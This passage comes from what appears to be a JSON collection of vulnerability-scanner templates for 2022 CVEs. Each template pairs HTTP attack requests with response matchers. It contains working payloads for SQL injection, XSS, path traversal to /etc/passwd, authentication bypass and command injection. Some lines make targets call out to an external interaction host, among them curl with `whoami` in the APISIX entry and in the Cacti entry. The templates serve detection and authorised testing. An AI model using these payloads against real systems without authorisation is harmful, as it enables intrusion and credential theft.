application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)\")","contains(body_2, \"newstatpress_page\")"],"condition":"and"}]}]},{"id":"CVE-2022-45917","info":{"name":"ILIAS eLearning <7.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/shib_logout.php?action=logout&return=https://oast.me","{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-44951","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-29298","info":{"name":"SolarView Compact 6.00 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0169","info":{"name":"Photo Gallery by 10Web < 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22972","info":{"name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /vcac/ HTTP/1.1\nHost: {{Hostname}}\n","GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\nHost: {{Hostname}}\n","POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\nHost: {{interactsh-url}}\nContent-type: application/x-www-form-urlencoded\n\nprotected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["HZN="]},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"protected_state","group":1,"regex":["id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"horizonRelayState","group":1,"regex":["name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstore","group":1,"regex":["id=\"userstore\" value=\"([a-z.]+)\" \\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstoreDisplay","group":1,"regex":["id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"regex","name":"stickyConnectorId","group":1,"regex":["name=\"stickyConnectorId\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"kval","name":"HZN-Cookie","kval":["HZN"],"part":"header"}]}]},{"id":"CVE-2022-38131","info":{"name":"RStudio Connect - Open Redirect","severity":"medium"},"requests":[{"raw":["GET //%5coast.me HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[307]}]}]},{"id":"CVE-2022-28923","info":{"name":"Caddy 2.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-24129","info":{"name":"Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["ShibbolethIdp"]}]}]},{"id":"CVE-2022-42747","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-4117","info":{"name":"WordPress IWS Geo Form Fields <=1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-24223","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nemail={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")"],"condition":"and"}]}]},{"id":"CVE-2022-24899","info":{"name":"Contao <4.13.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","\"Not authenticated\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-34093","info":{"name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")"],"condition":"and"}]}]},{"id":"CVE-2022-29009","info":{"name":"Cyber Cafe Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ccms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=%27+Or+1--+-&password=1&login=\n","GET /ccms/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CCMS Admin Dashboard","CCMS ADMIN | Admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1883","info":{"name":"Terraboard <2.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nGET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["\"page\":","\"results\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23178","info":{"name":"Crestron Device - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/aj.html?a=devi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uname\":","\"upassword\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46934","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls"],"matchers-condition":"and","matchers":[{"type":"word","words":["document.getElementById(\"http://\");alert(document.domain);//\").click();","viewer.min.css"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4140","info":{"name":"WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd","{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2290","info":{"name":"Trilium <0.52.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No handler matched for custom <img src=x onerror=alert(document.domain)>","Note '<img src=x onerror=alert(document.domain)>' not found"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-32429","info":{"name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SSID1"]},{"type":"regex","part":"header","regex":["filename=\"Settings(.*).dat","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4049","info":{"name":"WP User <= 7.0 - Unauthenticated SQLi","severity":"critical"},"requests":[{"raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)\n"],"attack":"clusterbomb","payloads":{"path":["/index.php/user/","/user"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header_2, \"text/html\")","contains(body_2, 'Invalid Access')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"wpuser_update_setting\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-36446","info":{"name":"Webmin <1.997 - Authenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}\n","POST /package-updates/update.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\nmode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}","uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0349","info":{"name":"WordPress NotificationX <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnx_id=sleep(6) -- x\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"data\\\":{\\\"success\\\":true}\")"],"condition":"and"}]}]},{"id":"CVE-2022-40879","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>=PQ</p>","\u8be5\u6587\u4ef6\u4e0d"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1168","info":{"name":"WordPress WP JobSearch <1.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(domain)>","wp-jobsearch"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-38553","info":{"name":"Academy Learning Management System <5.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","Study any topic"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0814","info":{"name":"Ubigeo de Peru < 3.6.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["idProv","idDist","distrito"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0826","info":{"name":"WordPress WP Video Gallery <=1.7.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wp_video_gallery_ajax_add_single_youtube&url=http://oast.me/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Registred videos :\")"],"condition":"and"}]}]},{"id":"CVE-2022-25486","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertConfigField.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurlConfig=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43015","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","MySQL Query Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24112","info":{"name":"Apache APISIX - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apisix/batch-requests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n\n{\n  \"headers\":{\n    \"X-Real-IP\":\"127.0.0.1\",\n    \"Content-Type\":\"application/json\"\n  },\n  \"timeout\":1500,\n  \"pipeline\":[\n    {\n      \"method\":\"PUT\",\n      \"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n      \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n \\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n    }\n  ]\n}\n","GET /api/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"reason\":\"OK\"","\"status\":200"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-24627","info":{"name":"AudioCodes Device Manager Express - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"audiocodes</title>\")"],"internal":true}]},{"raw":["POST /admin/AudioCodes_files/process_login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=&domain=&p=%5C%27or+1%3D1%23\n"],"matchers":[{"type":"word","part":"body","words":["SQL syntax","mysql_fetch","You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2022-1946","info":{"name":"WordPress Gallery <2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40734","info":{"name":"Laravel Filemanager v2.5.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd","{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"],"stop-at-first-match":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-25487","info":{"name":"Atom CMS v2.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /admin/uploads.php?id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"\n\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: image/jpeg\n\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------30623082103363803402542706041--\n","GET /uploads/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["SET avatar = '(.*?)'"],"internal":true}]}]},{"id":"CVE-2022-4301","info":{"name":"WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Registration Form"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32024","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0692","info":{"name":"Rudloff alltube prior to 3.0.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-34049","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/ExportLogs.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login","Password"],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42746","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-44944","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-46169","info":{"name":"Cacti <=1.2.22 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 127.0.0.1\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"value\":","\"local_data_id\":"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31656","info":{"name":"VMware - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","<servlet-name>"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34047","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /set_safety.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-1910","info":{"name":"WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["widget-title\"><script>alert(document.domain)</script></h3>","aux-widget"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39986","info":{"name":"RaspAP 2.8.7 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncfg_id=;id;#\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0597","info":{"name":"Microweber < 1.2.11 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/logout?redirect_to=http://oast.pro/"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2022-0846","info":{"name":"SpeakOut Email Petitions < 2.14.15.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Your signature has been added\") || contains(body, \"This petition has already been signed using your email address\")"],"condition":"and"}]}]},{"id":"CVE-2022-34045","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: 